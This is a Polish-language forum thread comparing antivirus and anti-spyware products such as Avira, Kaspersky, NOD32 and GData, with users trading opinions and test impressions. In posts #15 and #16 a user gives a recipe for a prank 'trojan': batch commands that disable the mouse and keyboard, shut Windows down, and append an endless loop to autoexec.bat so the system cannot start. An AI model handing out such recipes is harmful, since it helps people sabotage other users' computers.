Re: re:
#1
Witam kiedys mialem Avira antivir lecz strzasznie mi wiesil kompa:xpotem zmienilem na Nod32 i wykryl kilka infekcji lecz po 2-3 mioesiacach zmienilem na Kaspersky 6.0 ale mysle ze Avira Antivir jest najlepsza z nich wszystkichGrin. Czy mogl by mi ktos doradzic?? Czy Antivir czy Kaspersky ??. Mysle ze avira ma wieksza baze sygnatur i wiekszosc wykrywania wirkow. Mysle ze mam cos w systemie bo komp mi sie czasami wiesza.
:wink:

Dziekuje !!!
Odpowiedz
#2
jeśli myślisz ze masz wira to wrzuć logi ... ale nie tu tylko do innego tematu Wink
Avira: jest freeware (bezpłatna wersja dla użytkownika domowego)
Kasperscy:jest płatny

kto powie coś więcej bo jak dla mnie taka informacja dużo mówiLol
Odpowiedz
#3
dymek9229 napisał(a):jeśli myślisz ze masz wira to wrzuć logi ... ale nie tu tylko do innego tematu Wink
Avira: jest freeware (bezpłatna wersja dla użytkownika domowego)
Kasperscy:jest płatny

kto powie coś więcej bo jak dla mnie taka informacja dużo mówiLol


Aha dzieki:wink:

Moze temat sie rozwinie:banan:
Odpowiedz
#4
Witam. Trudno powiedzieć który lepszy, Kaspersky to bardziej rozbudowany program, zużywa więcej zasobów komputera, ale wykrywalność ma bardzo dobrą (jeśli nie najlepszą ze wszystkich AV). Avira to malutki prosty programik (co oczywiście nie jest wadą), zużywa mało zasobów, wykrywalność ma dobrą i lepszą od Kasperskyego 6 głównie jeśli chodzi o backdoory i trojany, gorszą przy wirusach skryptowych. Wadą Aviry jest dużo więcej fałszywych alarmów od Kaspra (no i może brak PL), zaleta to, że jest darmowy (classic).
P.S. Podsumowując: po latach doświadczeń moim zdaniem płatny i najlpeszy AV (zwłaszcza do biur, firm i na wydajne komputery) to Kaspersky. Najlepszy AV do domu, mały i darmowy to Avira Antivir Wink.
Odpowiedz
#5
Krasnal napisał(a):Witam. Trudno powiedzieć który lepszy, Kaspersky to bardziej rozbudowany program, zużywa więcej zasobów komputera, ale wykrywalność ma bardzo dobrą (jeśli nie najlepszą ze wszystkich AV). Avira to malutki prosty programik (co oczywiście nie jest wadą), zużywa mało zasobów, wykrywalność ma dobrą i lepszą od Kasperskyego 6 głównie jeśli chodzi o backdoory i trojany, gorszą przy wirusach skryptowych. Wadą Aviry jest dużo więcej fałszywych alarmów od Kaspra (no i może brak PL), zaleta to, że jest darmowy (classic).
P.S. Podsumowując: po latach doświadczeń moim zdaniem płatny i najlpeszy AV (zwłaszcza do biur, firm i na wydajne komputery) to Kaspersky. Najlepszy AV do domu, mały i darmowy to Avira Antivir Wink.


Lecz wydaje mi sie antivir jest lepszy wchodzac na ta stronke

[Aby zobaczyć linki, zarejestruj się tutaj]

zauwazylem ze wiekszosc tych wirkow lepiej wykrywa Avira AntiVir poniewaz na Heurystyke a kaspersky niema Grin
chyba zmienie na avire Smile .

A ktory antispyware jest dobry??

Dziekuje za opowiedzi 8)8)
a czy avira antivir ma "scanner-online"??
Odpowiedz
#6
No różne testy różnie pokazują. Nie trzeba im ufać w 100% chociaż coś tam z tego jednak wynika Wink. W przypadku Avira Premium wykrywalność być może jest nawet lepsza jak Kasper, a z Classic nie wiem na 100% jak to jest. W większości testów zamiast Classic testują Premium.
Kasper ma ochronę proaktywną, czyli wykrywa zagrożenia po zachowaniu się pliku, coś jak heurystyka w Avira i innych AV.
Moim zdaniem dobry antispyware to np. Spy Sweeper, Spyware Doctor. Jest tego masa, ciężko powiedziej który najskuteczniejszy.
Avira skanera online chyba nie posiada (tzn. skanowanie przez neta). Niech się wypowie ktoś z Aviry.
Pozdrawiam.
Odpowiedz
#7
Krasnal napisał(a):No różne testy różnie pokazują. Nie trzeba im ufać w 100% chociaż coś tam z tego jednak wynika Wink. W przypadku Avira Premium wykrywalność być może jest nawet lepsza jak Kasper, a z Classic nie wiem na 100% jak to jest. W większości testów zamiast Classic testują Premium.
Kasper ma ochronę proaktywną, czyli wykrywa zagrożenia po zachowaniu się pliku, coś jak heurystyka w Avira i innych AV.
Moim zdaniem dobry antispyware to np. Spy Sweeper, Spyware Doctor. Jest tego masa, ciężko powiedziej który najskuteczniejszy.
Avira skanera online chyba nie posiada (tzn. skanowanie przez neta). Niech się wypowie ktoś z Aviry.
Pozdrawiam.


Ja zmieniam spyware doctor na spy sweeper Tongue ....... 8)8)8)


A co myslicie oSTOPzilla
Odpowiedz
#8
Już samo to że jest shareware dyskwalifikuje go i to już na przedbiegach. Po za tym skoro będziesz miał dobrego AV i antispyware to po co Ci bedzie potrzebny taki zbędny dodatek ?

P.S. spy sweeper nie jest darmowym programem antispyware, jeśli chciałbyś
jakąś darmową alternatywę, to pronowałbym Sbybot search & destroy lub adaware
"Nie jestem konsumentem mieszczącym się w standardzie
Nie jestem gatunkiem skazanym na wymarcie
Nie jestem obiektem medialnego hałasu
Jestem nielegalnym zabójcą czasu"
Odpowiedz
#9
bodek napisał(a):Już samo to że jest shareware dyskwalifikuje go i to już na przedbiegach. Po za tym skoro będziesz miał dobrego AV i antispyware to po co Ci bedzie potrzebny taki zbędny dodatek ?

P.S. spy sweeper nie jest darmowym programem antispyware, jeśli chciałbyś
jakąś darmową alternatywę, to pronowałbym Sbybot search & destroy lub adaware


Odinstalowalem ta powalona StopZilla powalony program i w dotatku platny :evil: . A SpySwepper znalazl mi 1 rootkita Tongue . DziekiTongueTongue
chcialem go zpiracic jednak tego nie zrobie bo jeszcze jakies syfy mi wpadna do systemu30 dni mi wystarczy. TongueTongueGrin
Odpowiedz
#10
ja mialem kasperskiego , avasta i takie tam .. ale po pewnym czasie pan kasperky wrzucil mi do autostartu "reboot system" (po 3 godzinach z kolega dopiero sie zorientowalismy co jest) i po odpaleniu systemu windows po 5 sekundach system sie resetowal i tak w kolo macieju wiec juz go nie uzywam, z avastem tez mialem problem blokowal mi internet po pewnym czasie przeszedlem na parasoleczke i mam spokoj a ostanio zakupilem wlasnie premium narazie jest ok i jestem zadowolny tylko mam roblem z drugim komputerem w tej samej sieci i firewallem

[Aby zobaczyć linki, zarejestruj się tutaj]

Odpowiedz
#11
AVIRA RZĄDZI. Kaspersky ZAMULA i długo skanuje.
Odpowiedz
#12
PascalHPTwoja ocena wymaga trochę lekkiego rozwinięcia.
"Nie jestem konsumentem mieszczącym się w standardzie
Nie jestem gatunkiem skazanym na wymarcie
Nie jestem obiektem medialnego hałasu
Jestem nielegalnym zabójcą czasu"
Odpowiedz
#13
Już parę razy zdarzyło mi się złapać wirka którego Avira wykryła, testując ten plik na nodzie i kasprzaku nic nie wykryły dopiero jak posłałem im do analizy to
dali sygnaturki.Tak że uważam iż Avira jest The Best Smile
Lecz nie zapomnijmy ze nie ma 100% ochrony antywirusowej wśród programów AV pozdrawiam

[Aby zobaczyć linki, zarejestruj się tutaj]

]
Odpowiedz
#14
Dokładnie. Avira wg mnie ma tylko jedną wadę - zaraz po uruchomieniu systemu strasznie mi zamula komputer, ale to chwilowe - jakieś 15 sekund. Potem już wszystko działa OK.
Nie ważne jak mocno uderzasz, ale jak mocny cios potrafisz przyjąć od życia i iść dalej. Ile możesz znieść i ciągle iść na przód! Tak się wygrywa. Użalanie się nad sobą nie przynosi rozwiązań.... !
Odpowiedz
#15
Na własnej skurze sie przekonałem że kaspersky jest lepszy mozna utworzyc trojany takie
rundll32 mouse,disablekasperski nie daje zapisac w notatniku avira wykrywa dopiero po utworzeniu
rundll32 keyboard,disable Avira daje d...więc instaluje kaspra6 po instalce wyje że trojan bo tak jest, kasperski informuje ze skanowanie kompa sie nie odbyło po instalce więc jedziemy dalej.
Okazuje sie że w bitcomecie sciagam syf avirka sobie grzecznie siedziała.
Aby utworzyc trojana robimy tak prawo klik ,nowy dokument textowy,wpisujemy rundll32 mouse,disablewyłaczy myszke po resecie kompa
lub rundll32 keyboard,disable tu wyłączy klawiature
i zmieniamy nazwe dokumentu na exe lub bat
Odpowiedz
#16
rundll32 mouse,disable - powoduje wyłącznie myszki
rundll32 keyboard,disable - wyłącza klawiaturę
rundll32 krnl386.exe,exitkernel - zamykanie windowsa
echo :petla>>c:autoexec.bat -nie dopuszczanie do startu systemu
echo goto petla>>c:autoexec.bat - ____||____
start

[Aby zobaczyć linki, zarejestruj się tutaj]

-owieranie strony
game maker.exe -uruchamianie pliku (wybierz własną nazwę)

kod należy skopiować do notatnika i zapisać w formacie bat (lub exe)i nie radze zabawy z AVIRĄsory że pod postem ale tak wyszło
Odpowiedz
#17
tzn miałem jak kompy miały procesory po 250nhz i mniej a 128 ramu to był max i ludzie nażekali na symanteca, nie wiedząc że trzeba wiele usług wyłączyc nie potrzebnych w msconfigGrin, choćby usługa przełączania użytkowników w tle bierze 16mb ramu a nie nażekać na zamulenia,dziś 1 giga ramu to nie wodotrysk, a procesory stały sie standart 2xrdzenie
Odpowiedz
#18
Przeniosłem , teraz możecie dyskutować do woli.
Odpowiedz
#19
Avira - Kaspersky ; ale to nie to samo, tylko w innym interfejsie?
Swego czasu szukałem zamiennika dla firmy Kaspersky, ale:
GData, F-Secure, e-Scan, Avira - wszyscy mają silniki (tzn. są uzależnieni od ewentualnych kaprysów) Kaspersky.
Niestety pozostali są minimum 5% do tyłu z wykrywalnością.

To co - poradzicie coś?
Odpowiedz
#20
Na podstawie własnych doświadczeń, różnych testów i opinii na forach uważam, że dla kogoś, kto chce, lub musi kupić antywirusa, posiada bardzo mocną maszynę i ceni sobie przede wszystkim skuteczność, najlepszym wyborem jest GData.

Jeżeli oprócz bardzo wysokiej skuteczności cenimy sobie również lekkość i szybkość, lub nie posiadamy bardzo mocnego kompa, wtedy najlepsza będzie Avira Premium.

Gdy chcemy kupić pakiet antywirusowy, najlepszym wyborem pod względem skuteczności skanera i firewalla jest Kaspersky. Lżejszym i szybszym pakietem, który posiada znakomity skaner i słabszą zaporę jest
Avira Premium Security Suite.

Gdy chcemy mieć darmowy soft, i nie chcemy wykradać (crackować), najlepiej wybrać, Avirę Free + antyspyware, albo skorzystać z promocji lub triali (Gdata, Avira, F-Secure, Kaspersky).

Jeżeli posiadamy kulejący system i Avira nie chce prawidłowo działać, chcemy mieć polskojęzyczny darmowy program, wówczas najlepiej zainstalować Avasta, lub znaleźćpromocję, albo jechać na trialach.

Pozdrawiam!

Jurek, lub Zenek :o)
Odpowiedz


Skocz do:


Użytkownicy przeglądający ten wątek: 1 gości